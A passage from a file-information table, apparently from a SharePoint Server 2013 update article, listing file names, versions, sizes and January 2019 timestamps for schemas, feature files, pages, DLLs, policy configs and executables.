27-Jan-19| 11:06 \nschema.xml_pubfeap| schema.xml| | 31199| 27-Jan-19| 11:06 \nreportcenterdoclibupload_aspx| upload.aspx| | 5911| 27-Jan-19| 11:06 \nrlupload.aspx| upload.aspx| | 5911| 27-Jan-19| 11:06 \nupload.aspx_doclib| upload.aspx| | 5911| 27-Jan-19| 11:06 \nupload.aspx_ldoclib| upload.aspx| | 5911| 27-Jan-19| 11:06 \nupload.aspx_pubfeap| upload.aspx| | 5911| 27-Jan-19| 11:06 \nupload.aspx_pubresfeat| upload.aspx| | 5911| 27-Jan-19| 11:06 \ndoclib.xml| documentlibrary.xml| | 476| 27-Jan-19| 11:06 \nfeature.xml_doclib| feature.xml| | 499| 27-Jan-19| 11:06 \nelements.xml_downloadfromofficedotcom| elements.xml| | 114| 27-Jan-19| 11:06 \nfeature.xml_downloadfromofficedotcom| feature.xml| | 521| 27-Jan-19| 11:06 \nemltemplates.xml| emailtemplates.xml| | 2233| 27-Jan-19| 11:06 \nemltemplates.xml_14| emailtemplates.xml| | 2233| 27-Jan-19| 11:06 \nevalnoupg.xml| evalsitecreatewithnoupgrade.xml| | 1443| 27-Jan-19| 11:06 \nevalnoupg.xml_14| evalsitecreatewithnoupgrade.xml| | 1443| 27-Jan-19| 11:06 \nevalupg.xml| evalsitecreationwithupgrade.xml| | 1184| 27-Jan-19| 11:06 \nevalupg.xml_14| evalsitecreationwithupgrade.xml| | 1184| 27-Jan-19| 11:06 \nevaldelete.xml| evalsitedeleted.xml| | 440| 27-Jan-19| 11:06 \nevaldelete.xml_14| evalsitedeleted.xml| | 440| 27-Jan-19| 11:06 \nevalexp.xml| evalsitenearingexpiry.xml| | 1030| 27-Jan-19| 11:06 \nevalexp.xml_14| evalsitenearingexpiry.xml| | 1030| 27-Jan-19| 11:06 \nevalrequest.xml| evalsiterequested.xml| | 363| 27-Jan-19| 11:06 \nevalrequest.xml_14| evalsiterequested.xml| | 363| 27-Jan-19| 11:06 \nemltemplatefeat.xml| feature.xml| | 518| 27-Jan-19| 11:06 \nemltemplatefeat.xml_14| feature.xml| | 518| 27-Jan-19| 11:06 \nsiteupg.xml| siteupgraded.xml| | 922| 27-Jan-19| 11:06 \nsiteupg.xml_14| siteupgraded.xml| | 922| 27-Jan-19| 11:06 \nsiteupgfailed.xml| siteupgradefailed.xml| | 807| 27-Jan-19| 11:06 \nsiteupgfailed.xml_14| siteupgradefailed.xml| | 807| 27-Jan-19| 11:06 \nupgavail.xml| upgradeavailable.xml| | 1129| 27-Jan-19| 11:06 \nupgavail.xml_14| upgradeavailable.xml| | 1129| 27-Jan-19| 11:06 \nschema.xml_events| schema.xml| | 27131| 27-Jan-19| 11:06 \nevents.xml| events.xml| | 481| 27-Jan-19| 11:06 \nfeature.xml_events| feature.xml| | 975| 27-Jan-19| 11:06 \nschema.xml_external| schema.xml| | 3389| 27-Jan-19| 11:06 \nextlist.xml| externallist.xml| | 437| 27-Jan-19| 11:06 \nfeature.xml_external| feature.xml| | 485| 27-Jan-19| 11:06 \nextsubs_schema.xml| schema.xml| | 2775| 27-Jan-19| 11:06 \nextsubs.xml| extsubs.xml| | 470| 27-Jan-19| 11:06 \nextsubs_feature.xml| feature.xml| | 1216| 27-Jan-19| 11:06 \nextsubs_listinstance.xml| listinstance.xml| | 446| 27-Jan-19| 11:06 \nschema.xml_facility| schema.xml| | 5279| 27-Jan-19| 11:06 \nfacility.xml| facilitylist.xml| | 552| 27-Jan-19| 11:06 \nfeature.xml_facility| feature.xml| | 1064| 27-Jan-19| 11:06 \nschema.xml_fcgroups| schema.xml| | 5266| 27-Jan-19| 11:06 \nfcgroups.xml| fcgroupslist.xml| | 518| 27-Jan-19| 11:06 \nfeature.xml_fcgroups| feature.xml| | 546| 27-Jan-19| 11:06 \nfeature_0003.xml| feature.xml| | 1346| 27-Jan-19| 11:06 \nfldswss.xml| fieldswss.xml| | 222599| 27-Jan-19| 11:06 \nfldswss2.xml| fieldswss2.xml| | 469| 27-Jan-19| 11:06 \nfldswss3.xml| fieldswss3.xml| | 50780| 27-Jan-19| 11:06 \nfldswss4.xml| fieldswss4.xml| | 11512| 27-Jan-19| 11:06 \nschema.xml_gantt| schema.xml| | 15783| 27-Jan-19| 11:06 \ngantttl.xml| gantttaskslist.xml| | 496| 27-Jan-19| 11:06 \nfeature.xml_gantt| feature.xml| | 475| 27-Jan-19| 11:06 \nfeature_gbwprovision.xml| feature.xml| | 710| 27-Jan-19| 11:06 \nlistinstance_gbwprovision.xml| listinstance.xml| | 816| 27-Jan-19| 11:06 \nelements.xml_gbwwebparts| elements.xml| | 596| 27-Jan-19| 11:06 \nfeature.xml_gbwwebparts| feature.xml| | 346| 27-Jan-19| 11:06 \ntimecard.dwp_gbwwebparts| timecard.dwp| | 442| 27-Jan-19| 11:06 \nwhatsnew.dwp_gbwwebparts| whatsnew.dwp| | 448| 27-Jan-19| 11:06 \nwhereabouts.dwp_gbwwebparts| whereabouts.dwp| | 445| 27-Jan-19| 11:06 \nelements.xml| elements.xml| | 1584| 27-Jan-19| 11:06 \nfeature_gettingstarted.xml| feature.xml| | 957| 27-Jan-19| 11:06 \ngettingstarted.asx| gettingstarted.aspx| | 2904| 27-Jan-19| 11:06 \nelements.xml_gsappcatsite| elements.xml| | 483| 27-Jan-19| 11:06 \nfeature.xml_gsappcatsite| feature.xml| | 769| 27-Jan-19| 11:06 \ngettingstartedwithappcatalogsite.webpart_gsappcatsite| gettingstartedwithappcatalogsite.webpart| | 915| 27-Jan-19| 11:06 \nschema.xml_gridlist| schema.xml| | 2824| 27-Jan-19| 11:06 \ngridlist.xml| gridlist.xml| | 454| 27-Jan-19| 11:06 \nfeature.xml_gridlist| feature.xml| | 477| 27-Jan-19| 11:06 \nfeature_groupwork.xml| feature.xml| | 728| 27-Jan-19| 11:06 \nlistinstance_groupwork.xml| listinstance.xml| | 962| 27-Jan-19| 11:06 \nschema.xml_helplibrary| schema.xml| | 18584| 27-Jan-19| 11:06 \nhelplibrary.xml| helplibrary.xml| | 587| 27-Jan-19| 11:06 \nfeature.xml_helplibrary| feature.xml| | 566| 27-Jan-19| 11:06 \nhelpcontenttypes| helpcontenttypes.xml| | 3976| 27-Jan-19| 11:06 \nhelpsitecolumns| helpsitecolumns.xml| | 7052| 27-Jan-19| 11:06 \nschema.xml_hierarchy| schema.xml| | 20345| 27-Jan-19| 11:06 \nhierarchyl.xml| hierarchytaskslist.xml| | 1459| 27-Jan-19| 11:06 \nfeature.xml_hierarchy| feature.xml| | 3460| 27-Jan-19| 11:06 \nschema.xml_holiday| schema.xml| | 7813| 27-Jan-19| 11:06 \nholiday.xml| holidayslist.xml| | 541| 27-Jan-19| 11:06 \nfeature.xml_holiday| feature.xml| | 1048| 27-Jan-19| 11:06 \nfeature.xml_ifedependentapps| feature.xml| | 412| 27-Jan-19| 11:06 \nschema.xml_imedic| schema.xml| | 5726| 27-Jan-19| 11:06 \nimedic.xml| imediclist.xml| | 1655| 27-Jan-19| 11:06 \nfeature.xml_imedic| feature.xml| | 894| 27-Jan-19| 11:06 \nschema.xml_issues| schema.xml| | 9760| 27-Jan-19| 11:06 \nissues.xml| issues.xml| | 446| 27-Jan-19| 11:06 \nfeature.xml_issues| feature.xml| | 466| 27-Jan-19| 11:06 \nschema.xml_links| schema.xml| | 41072| 27-Jan-19| 11:06 \nlinks.xml| links.xml| | 441| 27-Jan-19| 11:06 \nfeature.xml_links| feature.xml| | 476| 27-Jan-19| 11:06 \nschema.xml_mainlo| schema.xml| | 2006| 27-Jan-19| 11:06 \nschema.xml_mainlo_v14| schema.xml| | 2006| 27-Jan-19| 11:06 \nfeature.xml_mainlo| feature.xml| | 706| 27-Jan-19| 11:06 \nfeature.xml_mainlo_v14| feature.xml| | 706| 27-Jan-19| 11:06 \nmaintenancelogsinstance.xml_mainlo| maintenancelogsinstance.xml| | 412| 27-Jan-19| 11:06 \nmaintenancelogsinstance.xml_mainlo_v14| maintenancelogsinstance.xml| | 412| 27-Jan-19| 11:06 \nmaintenancelogstemplate.xml_mainlo| maintenancelogstemplate.xml| | 728| 27-Jan-19| 11:06 \nmaintenancelogstemplate.xml_mainlo_v14| maintenancelogstemplate.xml| | 728| 27-Jan-19| 11:06 \nfeature.xml_mbrowserredirect| feature.xml| | 418| 27-Jan-19| 11:06 \nfeature.xml_mbrowserredirectstapling| feature.xml| | 437| 27-Jan-19| 11:06 \nfeature.xml_mbrowserredirectfeaturestp| featurestapling.xml| | 637| 27-Jan-19| 11:06 \nfeature.xml_mds| feature.xml| | 520| 27-Jan-19| 11:06 \nmriddflt.xml| default.aspx| | 1270| 27-Jan-19| 11:06 \nmridelms.xml| elements.xml| | 210| 27-Jan-19| 11:06 \nmridfeat.xml| feature.xml| | 461| 27-Jan-19| 11:06 \nelements.xml_mpswebparts| elements.xml| | 583| 27-Jan-19| 11:06 \nfeature.xml_mpswebparts| feature.xml| | 469| 27-Jan-19| 11:06 \nncwfl.xml| nocodeworkflowlibrary.xml| | 1118| 27-Jan-19| 11:06 \nschema.xml_nocodepublicwf| schema.xml| | 4515| 27-Jan-19| 11:06 \nschema.xml_nocodewf| schema.xml| | 4455| 27-Jan-19| 11:06 \nfeature.xml_nocodewf| feature.xml| | 493| 27-Jan-19| 11:06 \nschema.xml_oecatalog| schema.xml| | 24259| 27-Jan-19| 11:06 \nfeature.xml_oecatalog| feature.xml| | 1840| 27-Jan-19| 11:06 \noecatalogfields.xml_oecatalog| oecatalogfields.xml| | 7204| 27-Jan-19| 11:06 \noecataloginstance.xml_oecatalog| oecataloginstance.xml| | 436| 27-Jan-19| 11:06 \noecatalogtemplate.xml_oecatalog| oecatalogtemplate.xml| | 718| 27-Jan-19| 11:06 \nfeature.xml_openinclient| feature.xml| | 435| 27-Jan-19| 11:06 \npnsubr.xml| pnsubscriberreceivers.xml| | 516| 27-Jan-19| 11:06 \npnsubs.xml| pnsubscribers.xml| | 425| 27-Jan-19| 11:06 \nschema.xml_pnsubs| schema.xml| | 1204| 27-Jan-19| 11:06 \nfeature.xml_pnsubs| feature.xml| | 883| 27-Jan-19| 11:06 \nlistinstance.xml_pnsubs| listinstance.xml| | 446| 27-Jan-19| 11:06 \npiclib.xml| picturelibrary.xml| | 473| 27-Jan-19| 11:06 \nallitems.aspx_piclib| allitems.aspx| | 3916| 27-Jan-19| 11:06 \ndispform.aspx_piclib| dispform.aspx| | 4735| 27-Jan-19| 11:06 \neditform.aspx_piclib| editform.aspx| | 4393| 27-Jan-19| 11:06 \nschema.xml| schema.xml| | 43005| 27-Jan-19| 11:06 \nselected.aspx_piclib| selected.aspx| | 3916| 27-Jan-19| 11:06 \nslidshow.aspx_piclib| slidshow.aspx| | 4133| 27-Jan-19| 11:06 \nupload.aspx_piclib| upload.aspx| | 6294| 27-Jan-19| 11:06 \nwebfldr.aspx_piclib| webfldr.aspx| | 2521| 27-Jan-19| 11:06 \nfeature.xml_piclib| feature.xml| | 864| 27-Jan-19| 11:06 \npromotedlinks.xml| promotedlinks.xml| | 495| 27-Jan-19| 11:06 \nschema.xml_promotedlinks| schema.xml| | 8219| 27-Jan-19| 11:06 \nfeature.xml_promotedlinks| feature.xml| | 497| 27-Jan-19| 11:06 \nschedule.xml| schedulelist.xml| | 526| 27-Jan-19| 11:06 \nfeature.xml_schedule| feature.xml| | 546| 27-Jan-19| 11:06 \nschema.xml_schedule| schema.xml| | 23502| 27-Jan-19| 11:06 \nfeature.xml_sharewitheveryone| feature.xml| | 622| 27-Jan-19| 11:06 \nfeature.xml_sharewitheveryonestapling| feature.xml| | 449| 27-Jan-19| 11:06 \nfeature.xml_sharewitheveryonefeaturestp| featurestapling.xml| | 215| 27-Jan-19| 11:06 \nfeature.xml_siteassets| feature.xml| | 526| 27-Jan-19| 11:06 \nfeature.xml_sitehelp| feature.xml| | 804| 27-Jan-19| 11:06 \nfeature.xml_sitenotebook| feature.xml| | 703| 27-Jan-19| 11:06 \nfeature.xml_0002| feature.xml| | 516| 27-Jan-19| 11:06 \nsitesettings.xml| sitesettings.xml| | 21358| 27-Jan-19| 11:06 \nelements.xml_sitestat| elements.xml| | 334| 27-Jan-19| 11:06 \nelements14.xml_sitestat| elements.xml| | 334| 27-Jan-19| 11:06 \nfeature.xml_sitestat| feature.xml| | 397| 27-Jan-19| 11:06 \nfeature14.xml_sitestat| feature.xml| | 397| 27-Jan-19| 11:06 \nupgfeature.xml| feature.xml| | 528| 27-Jan-19| 11:06 \nupgfeature.xml_14| feature.xml| | 528| 27-Jan-19| 11:06 \nsiteupgrade.xml| siteupgradelinks.xml| | 970| 27-Jan-19| 11:06 \nsiteupgrade.xml_14| siteupgradelinks.xml| | 970| 27-Jan-19| 11:06 \nelements.xml_suitenav| elements.xml| | 478| 27-Jan-19| 11:06 \nfeature.xml_suitenav| feature.xml| | 366| 27-Jan-19| 11:06 \nsurveys.xml| surveys.xml| | 477| 27-Jan-19| 11:06 \nfeature.xml_surveys| feature.xml| | 478| 27-Jan-19| 11:06 \nschema.xml_surveys| schema.xml| | 40244| 27-Jan-19| 11:06 \ntasks.xml| tasks.xml| | 468| 27-Jan-19| 11:06 \nfeature.xml_tasks| feature.xml| | 476| 27-Jan-19| 11:06 \nschema.xml_tasks| schema.xml| | 17465| 27-Jan-19| 11:06 \nfeature_teamcollab.xml| feature.xml| | 3223| 27-Jan-19| 11:06 \ndefault.xml_tenantadminbdc| default.xml| | 347| 27-Jan-19| 11:06 \nfeature.xml_tenantadminbdc| feature.xml| | 514| 27-Jan-19| 11:06 \nfeature.xml_tenantadminbdcstapling| feature.xml| | 443| 27-Jan-19| 11:06 \nfeature.xml_tenantadminbdcfeaturestp| featurestapling.xml| | 222| 27-Jan-19| 11:06 \ndefault.xml_tenantadminlinks| default.xml| | 3573| 27-Jan-19| 11:06 \nfeature.xml_tenantadminlinks| feature.xml| | 517| 27-Jan-19| 11:06 \ntimecard.xml| timecardlist.xml| | 8045| 27-Jan-19| 11:06 \nfeature.xml_timecard| feature.xml| | 916| 27-Jan-19| 11:06 \nschema.xml_timecard| schema.xml| | 8517| 27-Jan-19| 11:06 \nfeature.xml_excelserveredit| feature.xml| | 749| 27-Jan-19| 11:06 \nfeature.xml_excelserveredit_14| feature.xml| | 749| 27-Jan-19| 11:06 \nfeature.xml_officewebapps| feature.xml| | 752| 27-Jan-19| 11:06 \nfeature.xml_officewebapps_14| feature.xml| | 752| 27-Jan-19| 11:06 \nfeature.xml_onenoteserverviewing| feature.xml| | 752| 27-Jan-19| 11:06 \nfeature.xml_onenoteserverviewing_14| feature.xml| | 752| 27-Jan-19| 11:06 \nfeature.xml_wordserverviewing| feature.xml| | 752| 27-Jan-19| 11:06 \nfeature.xml_wordserverviewing_14| feature.xml| | 752| 27-Jan-19| 11:06 \nwbpglib.xml| webpagelibrary.xml| | 496| 27-Jan-19| 11:06 \nfeature.xml_webpagelib| feature.xml| | 478| 27-Jan-19| 11:06 \nschema.xml_webpagelib| schema.xml| | 16443| 27-Jan-19| 11:06 \nupload.aspx_webpagelib| upload.aspx| | 5911| 27-Jan-19| 11:06 \nwhatsnew.xml| whatsnewlist.xml| | 518| 27-Jan-19| 11:06 \nfeature.xml_whatsnew| feature.xml| | 521| 27-Jan-19| 11:06 \nschema.xml_whatsnew| schema.xml| | 21487| 27-Jan-19| 11:06 \nwhereabouts.xml| whereaboutslist.xml| | 1704| 27-Jan-19| 11:06 \nfeature.xml_whereabouts| feature.xml| | 1067| 27-Jan-19| 11:06 \nschema.xml_whereabouts| schema.xml| | 149506| 27-Jan-19| 11:06 \nfeature.xml_wikipagehomepage| feature.xml| | 902| 27-Jan-19| 11:06 \nfeature.xml_wikiwelcome| feature.xml| | 594| 27-Jan-19| 11:06 \nworkflowhistory.xml| workflowhistory.xml| | 489| 27-Jan-19| 11:06 \nfeature.xml_wrkflhis| feature.xml| | 482| 27-Jan-19| 11:06 \nschema.xml_wrkflhis| schema.xml| | 8019| 27-Jan-19| 11:06 \nworkflowprocess.xml| workflowprocess.xml| | 496| 27-Jan-19| 11:06 \nfeature.xml_wrkflproc| feature.xml| | 531| 27-Jan-19| 11:06 \nschema.xml_wrkflprc| schema.xml| | 629| 27-Jan-19| 11:06 \nformlib.xml| xmlformlibrary.xml| | 477| 27-Jan-19| 11:06 \nfeature.xml_xmlform| feature.xml| | 472| 27-Jan-19| 11:06 \neditdlg.htm_xmlform| editdlg.htm| | 4892| 27-Jan-19| 11:06 \nfiledlg.htm_xmlform| filedlg.htm| | 4754| 27-Jan-19| 11:06 \nrepair.aspx_xmlform| repair.aspx| | 3272| 27-Jan-19| 11:06 \nschema.xml_xmlform| schema.xml| | 20593| 27-Jan-19| 11:06 \nupload.aspx_xmlform| upload.aspx| | 5911| 27-Jan-19| 11:06 \nfgimg.png| fgimg.png| | 11776| 27-Jan-19| 11:07 \nmicrosoft.sharepoint.health.dll| microsoft.sharepoint.health.dll| 15.0.4989.1000| 109896| 27-Jan-19| 11:06 \nmicrosoft.sharepoint.identitymodel.dll| microsoft.sharepoint.identitymodel.dll| 15.0.4879.1000| 260352| 27-Jan-19| 11:06 \nadmin.dll_0001| admin.dll| 15.0.4454.1000| 18528| 27-Jan-19| 11:06 \nauthor.dll_0001| author.dll| 15.0.4454.1000| 18528| 27-Jan-19| 11:06 \nshtml.dll_0001| shtml.dll| 15.0.4454.1000| 18544| 27-Jan-19| 11:06 \njsgridcluster.png| jsgridcluster.png| | 2003| 27-Jan-19| 11:07 \nmicrosoft.online.sharepoint.dedicated.tenantadmin.dll| microsoft.online.sharepoint.dedicated.tenantadmin.dll| 15.0.4605.1000| 48832| 27-Jan-19| 11:07 \nmicrosoft.online.sharepoint.dedicated.tenantadmin.serverstub.dll| microsoft.online.sharepoint.dedicated.tenantadmin.serverstub.dll| 15.0.4535.1000| 79608| 27-Jan-19| 11:07 \nmicrosoft.sharepoint.client.dll| microsoft.sharepoint.client.dll| 15.0.5085.1000| 505936| 27-Jan-19| 02:58 \nmicrosoft.sharepoint.client.dll_0001| microsoft.sharepoint.client.dll| 15.0.5085.1000| 505936| 27-Jan-19| 02:58 \ntaps_client.dll| microsoft.sharepoint.client.dll| 15.0.5085.1000| 505936| | \nmicrosoft.sharepoint.client.phone.dll| microsoft.sharepoint.client.phone.dll| 15.0.5085.1000| 441632| 27-Jan-19| 11:05 \nmicrosoft.sharepoint.client.phone.runtime.dll| microsoft.sharepoint.client.phone.runtime.dll| 15.0.4859.1000| 206616| 27-Jan-19| 11:05 \nmicrosoft.sharepoint.client.runtime.dll| microsoft.sharepoint.client.runtime.dll| 15.0.4859.1000| 298240| 27-Jan-19| 02:58 \nmicrosoft.sharepoint.client.runtime.dll_0001| microsoft.sharepoint.client.runtime.dll| 15.0.4859.1000| 298240| 27-Jan-19| 02:58 \ntaps_client.runtime.dll| microsoft.sharepoint.client.runtime.dll| 15.0.4859.1000| 298240| | \nmicrosoft.sharepoint.client.serverruntime.dll| microsoft.sharepoint.client.serverruntime.dll| 15.0.4905.1000| 630608| 27-Jan-19| 11:06 \nmicrosoft.sharepoint.client.serverruntime.dll_0001| microsoft.sharepoint.client.serverruntime.dll| 15.0.4905.1000| 630608| 27-Jan-19| 11:06 \nmicrosoft.sharepoint.client.silverlight.dll| microsoft.sharepoint.client.silverlight.dll| 15.0.5085.1000| 440640| 27-Jan-19| 02:58 \nmicrosoft.sharepoint.client.silverlight.runtime.dll| microsoft.sharepoint.client.silverlight.runtime.dll| 15.0.4859.1000| 197424| 27-Jan-19| 02:58 \nspmintl.dll| microsoft.sharepoint.linq.codegeneration.intl.dll| 15.0.4420.1017| 17032| 27-Jan-19| 11:06 \nspldtsvc.dll| microsoft.sharepoint.linq.dataservice.dll| 15.0.4633.1000| 42720| 27-Jan-19| 11:06 \nsplinq.dll| microsoft.sharepoint.linq.dll| 15.0.4843.1000| 376032| 27-Jan-19| 11:06 \nsplinqvs.dll| microsoft.sharepoint.linq.dll| 15.0.4843.1000| 376032| 27-Jan-19| 11:06 \nsplintl.dll| microsoft.sharepoint.linq.intl.dll| 15.0.4420.1017| 26784| 27-Jan-19| 11:06 \nmicrosoft.sharepoint.serverstub.dll| microsoft.sharepoint.serverstub.dll| 15.0.4987.1000| 1427768| 27-Jan-19| 11:06 \nspnativerequestmoduledll_0001| spnativerequestmodule.dll| | 42064| 27-Jan-19| 11:06 \noffprsx.dll| offparser.dll| 15.0.5085.1000| 1496144| 27-Jan-19| 11:06 \noisimg.dll| oisimg.dll| 15.0.5085.1000| 96848| 27-Jan-19| 11:06 \nstslib.dll_0001| microsoft.sharepoint.library.dll| 15.0.4971.1000| 184576| 27-Jan-19| 11:06 \nowssvr.dll_0001| owssvr.dll| 15.0.5111.1001| 6385744| 27-Jan-19| 11:10 \nsts11plc.config| policy.11.0.microsoft.sharepoint.config| | 590| 27-Jan-19| 11:06 \nsts11plc.dll| policy.11.0.microsoft.sharepoint.dll| 15.0.4420.1017| 12456| 27-Jan-19| 11:06 \nspsec11.config| policy.11.0.microsoft.sharepoint.security.config| | 599| 27-Jan-19| 11:06 \nspsec11.dll| policy.11.0.microsoft.sharepoint.security.dll| 15.0.4420.1017| 12496| 27-Jan-19| 11:06 \nsts12plc.config| policy.12.0.microsoft.sharepoint.config| | 590| 27-Jan-19| 11:06 \nsts12plc.dll| policy.12.0.microsoft.sharepoint.dll| 15.0.4420.1017| 12456| 27-Jan-19| 11:06 \nspsec12.config| policy.12.0.microsoft.sharepoint.security.config| | 599| 27-Jan-19| 11:06 \nspsec12.dll| policy.12.0.microsoft.sharepoint.security.dll| 15.0.4420.1017| 12456| 27-Jan-19| 11:06 \nwfa12plc.config| policy.12.0.microsoft.sharepoint.workflowactions.config| | 606| 27-Jan-19| 11:06 \nwfa12plc.dll| policy.12.0.microsoft.sharepoint.workflowactions.dll| 15.0.4420.1017| 12488| 27-Jan-19| 11:06 \nwfs12plc.config| policy.12.0.microsoft.sharepoint.workflows.config| | 600| 27-Jan-19| 11:06 \nwfs12plc.dll| policy.12.0.microsoft.sharepoint.workflows.dll| 15.0.4420.1017| 12496| 27-Jan-19| 11:06 \nbusinessdata14.config| policy.14.0.microsoft.businessdata.config| | 592| 27-Jan-19| 11:06 \nbusinessdata14.dll| policy.14.0.microsoft.businessdata.dll| 15.0.4420.1017| 12464| 27-Jan-19| 11:06 \nclt14plc.config| policy.14.0.microsoft.sharepoint.client.config| | 597| 27-Jan-19| 11:06 \nclt14plc.dll| policy.14.0.microsoft.sharepoint.client.dll| 15.0.4420.1017| 12472| 27-Jan-19| 11:06 \ncltrtm14.config| policy.14.0.microsoft.sharepoint.client.runtime.config| | 605| 27-Jan-19| 11:06 \ncltrtm14.dll| policy.14.0.microsoft.sharepoint.client.runtime.dll| 15.0.4420.1017| 12488| 27-Jan-19| 11:06 \ncltsvr14.config| policy.14.0.microsoft.sharepoint.client.serverruntime.config| | 611| 27-Jan-19| 11:06 \ncltsvr14.dll| policy.14.0.microsoft.sharepoint.client.serverruntime.dll| 15.0.4420.1017| 12496| 27-Jan-19| 11:06 \nsts14plc.config| policy.14.0.microsoft.sharepoint.config| | 590| 27-Jan-19| 11:06 \nsts14plc.dll| policy.14.0.microsoft.sharepoint.dll| 15.0.4420.1017| 12472| 27-Jan-19| 11:06 \nlinq14.config| policy.14.0.microsoft.sharepoint.linq.config| | 595| 27-Jan-19| 11:06 \nlinq14.dll| policy.14.0.microsoft.sharepoint.linq.dll| 15.0.4420.1017| 12464| 27-Jan-19| 11:06 \npowshl14.config| policy.14.0.microsoft.sharepoint.powershell.config| | 601| 27-Jan-19| 11:06 \npowshl14.dll| policy.14.0.microsoft.sharepoint.powershell.dll| 15.0.4420.1017| 12480| 27-Jan-19| 11:06 \nspsec14.config| policy.14.0.microsoft.sharepoint.security.config| | 599| 27-Jan-19| 11:06 \nspsec14.dll| policy.14.0.microsoft.sharepoint.security.dll| 15.0.4420.1017| 12456| 27-Jan-19| 11:06 \nwfa14plc.config| policy.14.0.microsoft.sharepoint.workflowactions.config| | 606| 27-Jan-19| 11:06 \nwfa14plc.dll| policy.14.0.microsoft.sharepoint.workflowactions.dll| 15.0.4420.1017| 12488| 27-Jan-19| 11:06 \nwfs14plc.config| policy.14.0.microsoft.sharepoint.workflows.config| | 600| 27-Jan-19| 11:06 \nwfs14plc.dll| policy.14.0.microsoft.sharepoint.workflows.dll| 15.0.4420.1017| 12496| 27-Jan-19| 11:06 \ncmdui14.config| policy.14.0.microsoft.web.commandui.config| | 593| 27-Jan-19| 11:06 \ncmdui14.dll| policy.14.0.microsoft.web.commandui.dll| 15.0.4420.1017| 12464| 27-Jan-19| 11:06 \nformat.ps1xml| sharepointpowershell.format.ps1xml| | 61362| 27-Jan-19| 11:06 \nmicrosoft.sharepoint.powershell.dll_0001| microsoft.sharepoint.powershell.dll| 15.0.4949.1000| 993024| 27-Jan-19| 11:06 \nmicrosoft.sharepoint.powershell.intl.dll| microsoft.sharepoint.powershell.intl.dll| 15.0.4863.1000| 95488| 27-Jan-19| 11:06 \npsconsole.psc1| psconsole.psc1| | 181| 27-Jan-19| 11:06 \nsharepoint.ps1| sharepoint.ps1| | 9838| 27-Jan-19| 11:06 \nspcmdletschema.xsd| spcmdletschema.xsd| | 1114| 27-Jan-19| 11:06 \nwsscmdlet.xml| wsscmdlet.xml| | 113235| 27-Jan-19| 11:06 \ntypes.ps1xml| sharepointpowershell.types.ps1xml| | 18000| 27-Jan-19| 11:06 \npscintl.dll| microsoft.sharepoint.setupconfiguration.intl.dll| 15.0.4881.1000| 2093824| 27-Jan-19| 11:06 \npsconfig.exe| psconfig.exe| 15.0.4939.1000| 564544| 27-Jan-19| 11:06 \npsconfig.exe.config| psconfig.exe.config| | 273| 27-Jan-19| 11:06 \npsconfigui.exe| psconfigui.exe| 15.0.4939.1000| 825664| 27-Jan-19| 11:06 \npsconfigui.exe.config| psconfigui.exe.config| | 273| 27-Jan-19| 11:06 \ncore_0.rsx| core.resx| | 490005| 27-Jan-19| 11:07 \nadmincfg.xml| adminconfig.xml| | 1288| 27-Jan-19| 11:06 \nbdcservice.xml| bdcservice.xml| | 632| 27-Jan-19| 11:06 \njoinfarm.xml| joinfarm.xml| | 648| 27-Jan-19| 11:06 \nsilverlight.js_script| silverlight.js| | 7950| 27-Jan-19| 11:07 \nsts_addgallery_ooprovider| addgallery.officeonlineprovider.dll| 15.0.4420.1017| 43144| 27-Jan-19| 11:06 \naddgallery.aspx_silverlight| addgallery.aspx| | 11755| 27-Jan-19| 11:07 \ndldsln16.png| dldsln16.png| | 912| 27-Jan-19| 11:06 \ndldsln32.png| dldsln32.png| | 2612| 27-Jan-19| 11:06 \nsts_addgallery_server| microsoft.sharepoint.addgallery.server.dll| 15.0.4508.1000| 115904| 27-Jan-19| 11:06 \nsp.datetimeutil.res_0.resx| sp.datetimeutil.res.resx| | 5825| 27-Jan-19| 11:07 \nsp.datetimeutil.res_0.resx_0.scriptx| sp.datetimeutil.res.resx.scriptx| | 255| 27-Jan-19| 11:07 \nsp.jsgrid.res_0.resx| sp.jsgrid.res.resx| | 16415| 27-Jan-19| 11:07 \nsp.jsgrid.res_0.resx_0.scriptx| sp.jsgrid.res.resx.scriptx| | 249| 27-Jan-19| 11:07 \nsp.res_0.resx| sp.res.resx| | 73515| 27-Jan-19| 11:07 \nspmetal.exe| spmetal.exe| 15.0.4420.1017| 140488| 27-Jan-19| 11:06 \nsts.spuchostservice.exe| spuchostservice.exe| 15.0.4525.1000| 118040| 27-Jan-19| 11:06 \nsts.spuchostservice.exe.config| spuchostservice.exe.config| | 644| 27-Jan-19| 11:06 \nsts.spucworkerprocess.exe| spucworkerprocess.exe| 15.0.4510.1000| 46856| 27-Jan-19| 11:06 \nsts.spucworkerprocess.exe.config| spucworkerprocess.exe.config| | 654| 27-Jan-19| 11:06 \nsts.spucworkerprocessproxy.exe| spucworkerprocessproxy.exe| 15.0.4420.1017| 115440| 27-Jan-19| 11:06 \nsts.spucworkerprocessproxy.exe.config| spucworkerprocessproxy.exe.config| | 644| 27-Jan-19| 11:06 \nspusercode.dll_0001| microsoft.sharepoint.usercode.dll| 15.0.4525.1000| 26816| 27-Jan-19| 11:06 \nadmsoap.dll| admsoap.dll| 15.0.4420.1017| 15496| 27-Jan-19| 11:07 \nadmin.amx| admin.asmx| | 86| 27-Jan-19| 11:06 \nadmdisco.asx| admindisco.aspx| | 1283| 27-Jan-19| 11:06 \nadmwsdl.asx| adminwsdl.aspx| | 9474| 27-Jan-19| 11:06 \nweb.cfg_0001| web.config| | 445| 27-Jan-19| 11:06 \nstsadm.exe| stsadm.exe| 15.0.4420.1017| 350392| 27-Jan-19| 11:06 \nstsadm.exe.config| stsadm.exe.config| | 272| 27-Jan-19| 11:06 \nstscfg.exe| stscfg.exe| 15.0.4420.1017| 14944| 27-Jan-19| 11:06 \nbecwebserviceclientconfig| client.config| | 1437| 27-Jan-19| 11:06 \nsecuritytokenappsvc| appsts.svc| | 452| 27-Jan-19| 11:06 \nappwrweb.cfg| appwpresweb.config| | 1210| 27-Jan-19| 11:06 \ncloudweb.cfg| cloudweb.config| | 64941| 27-Jan-19| 11:06 \nstsomdia.dll| microsoft.sharepoint.diagnostics.dll| 15.0.4420.1017| 18080| 27-Jan-19| 11:07 \nstsom.dll| microsoft.sharepoint.dll| 15.0.5109.1000| 26845472| 30-Jan-19| 02:28 \nstsom.dll_0001| microsoft.sharepoint.dll| 15.0.5109.1000| 26845472| 30-Jan-19| 02:28 \nxlsrv.ecs.stsom.dll| microsoft.sharepoint.dll| 15.0.5109.1000| 26845472| 30-Jan-19| 02:28 \nxlsrv.ecswatchdog.stsom.dll| microsoft.sharepoint.dll| 15.0.5109.1000| 26845472| 30-Jan-19| 02:28 